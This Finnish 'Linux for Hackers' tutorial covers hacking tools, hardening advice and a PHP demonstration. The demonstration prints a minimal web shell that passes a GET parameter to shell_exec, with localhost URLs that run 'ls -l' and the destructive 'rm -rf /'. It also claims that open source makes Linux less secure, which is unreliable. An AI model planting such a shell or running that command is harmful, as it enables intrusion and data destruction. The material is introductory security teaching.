Linux on yleisimmin käytetty palvelinkäyttöjärjestelmä, erityisesti web-palvelimissa. Se on avoimen lähdekoodin järjestelmä; tämä tarkoittaa, että kuka tahansa voi päästä käsiksi lähdekoodiin. Tämä tekee siitä vähemmän turvallisen muihin käyttöjärjestelmiin verrattuna, sillä hyökkääjät voivat tutkia lähdekoodia haavoittuvuuksien löytämiseksi. Linux for Hackers käsittelee näiden haavoittuvuuksien hyödyntämistä järjestelmän luvattoman käytön saamiseksi.
Tässä artikkelissa esittelemme, mitä Linux on, sen tietoturva-aukkoja, hakkerointia Ubuntulla ja vastatoimia, joita voit ottaa käyttöön.
Tässä opetusohjelmassa käsitellyt aiheet
- Pikahuomautus Linuxista
- Linux-hakkerointityökalut
- Miten estää Linux-hakkerointi
- Hakkerointitoiminta: Linux-järjestelmän hakkerointi PHP:n avulla
Quick Note on Linux
Linux on avoimen lähdekoodin käyttöjärjestelmä. Linux-pohjaisista käyttöjärjestelmistä on monia jakeluja, kuten Redhat, Fedora ja Ubuntu jne. Toisin kuin muut käyttöjärjestelmät, Linux on tietoturvan osalta vähemmän turvallinen. Tämä johtuu siitä, että lähdekoodi on vapaasti saatavilla, joten siitä on helppo tutkia haavoittuvuuksia ja hyödyntää niitä verrattuna muihin käyttöjärjestelmiin, jotka eivät ole avoimen lähdekoodin järjestelmiä. Linuxia voidaan käyttää palvelin-, työpöytä-, tabletti- tai mobiililaitteiden käyttöjärjestelmänä.
Linux-ohjelmia voidaan käyttää joko graafisen käyttöliittymän tai komentojen avulla. Linux-komennot Kali Linuxin hakkeroinnissa ovat tehokkaampia ja toimivampia verrattuna GUI:n käyttöön. Tästä syystä on hyödyllistä tuntea Linuxin peruskomennot hakkerointia varten.
Tutustu näihin opetusohjelmiin https://www.guru99.com/unix-linux-tutorial.html siitä, miten pääset alkuun Kali Linuxin hakkeroinnissa.
Linux-hakkerointityökalut
- Nessus- tätä työkalua voidaan käyttää Ubuntun hakkerointiin, konfiguraatioasetusten, laastareiden ja verkkojen skannaamiseen jne. se löytyy osoitteesta https://www.tenable.com/products/nessus
- NMap. Tätä työkalua voidaan käyttää palvelimella toimivien isäntien ja niiden käyttämien palveluiden seurantaan. Sitä voidaan käyttää myös porttien skannaamiseen. Se löytyy osoitteesta https://nmap.org/
- SARA – SARA on lyhenne sanoista Security Auditor’s Research Assistant. Kuten nimestä voi päätellä, tätä työkalua voidaan käyttää verkkojen tarkastamiseen uhkia, kuten SQL Injectionia, XSS:ää jne. vastaan. se löytyy osoitteesta http://www-arc.com/sara/sara.html
Yllä oleva luettelo ei ole tyhjentävä; se antaa sinulle käsityksen Ubuntun hakkerointiin ja Linux-järjestelmien hakkerointiin saatavilla olevista työkaluista.
Miten estää Linux-hakkerointi
Linux-hakkerointi hyödyntää käyttöjärjestelmän haavoittuvuuksia. Organisaatio voi ottaa käyttöön seuraavat käytännöt suojautuakseen tällaisilta hyökkäyksiltä.
- Korjausten hallinta- korjaukset korjaavat virheitä, joita hyökkääjät käyttävät hyväkseen vaarantaakseen järjestelmän. Hyvällä korjaustenhallintakäytännöllä varmistetaan, että järjestelmään käytetään jatkuvasti asiaankuuluvia korjauksia.
- Käyttöjärjestelmän oikea konfigurointi- muut hyväksikäyttökohteet hyödyntävät palvelimen konfiguroinnissa olevia heikkouksia. Epäaktiiviset käyttäjätunnukset ja daemonit on poistettava käytöstä. Oletusasetukset, kuten sovellusten yhteiset salasanat, oletuskäyttäjänimet ja jotkin porttinumerot, olisi muutettava.
- Tunkeutumisen havaitsemisjärjestelmä- tällaisia työkaluja voidaan käyttää havaitsemaan luvaton pääsy järjestelmään. Joillakin työkaluilla on kyky havaita ja estää tällaiset hyökkäykset.
Hakkerointitoiminta: Hack a Ubuntu Linux System using PHP
Tässä käytännön skenaariossa opettelemme hakkeroimaan Ubuntulla ja annamme sinulle perustiedot siitä, miten voit käyttää PHP:tä Linuxin vaarantamiseen. Emme aio ottaa kohteeksi mitään uhria. Jos haluat kokeilla sitä, voit asentaa LAMPPin paikalliselle koneellesi.
PHP:n mukana tulee kaksi toimintoa, joita voidaan käyttää Linuxin hakkerointikomentojen suorittamiseen. Siinä on exec()- ja shell_exec()-funktiot. Funktio exec() palauttaa komennon tulosteen viimeisen rivin, kun taas shell_exec() palauttaa koko komennon tuloksen merkkijonona.
Demonstraation vuoksi oletetaan, että hyökkääjä hallinnoi seuraavan tiedoston lataamista verkkopalvelimelle.
<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>
HERE,
Yllä oleva skripti saa komennon cmd-nimisestä GET-muuttujasta. Komento suoritetaan komennolla shell_exec() ja tulokset palautetaan selaimeen.
Yllä olevaa koodia voidaan hyödyntää seuraavalla URL-osoitteella
http://localhost/cp/konsole.php?cmd=ls%20-l
TÄSTÄ,
- ”…konsole.php?cmd=ls%20-l ”antaa muuttujalle cmd arvon ls -l.
Ubuntussa palvelinta vastaan hakkerointia varten annettu komento suoritetaan seuraavasti:
shell_exec('ls -l') ;
Yllä olevan koodin suorittaminen web-palvelimella antaa seuraavan kaltaisia tuloksia.
Yllä oleva komento näyttää yksinkertaisesti nykyisen hakemiston tiedostot ja niiden käyttöoikeudet
Oletetaan, että hyökkääjä välittää seuraavan komennon
rm -rf /
TÄHÄN,
- ”rm” poistaa tiedostot
- ”rf” saa rm-komennon toimimaan rekursiivisessa tilassa. Poistaa kaikki kansiot ja tiedostot
- ”/” ohjeistaa komentoa aloittamaan tiedostojen poistamisen juurihakemistosta
Hyökkäyksen URL-osoite näyttäisi jotakuinkin tältä
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Yhteenveto
- Linux on palvelimiin, pöytäkoneisiin, tablet-laitteisiin ja mobiililaitteisiin tarkoitettu suosittu käyttöjärjestelmä
- Linux on avoimeen lähdekoodiin pohjautuva käyttöjärjestelmäkoodi, ja sen lähdekoodin saa kuka tahansa. Tämä tekee haavoittuvuuksien havaitsemisesta helppoa. Se on yksi parhaista käyttöjärjestelmistä hakkereille.
- Ubuntun perus- ja verkkohakkerointikomennot ovat arvokkaita Linux-hakkerille.
- Haavoittuvuudet ovat heikkouksia, joita voidaan käyttää hyväksi järjestelmän vaarantamiseksi.
- Hyvä tietoturva voi auttaa suojaamaan järjestelmää siltä, että hyökkääjä ei pääse vaarantamaan sitä.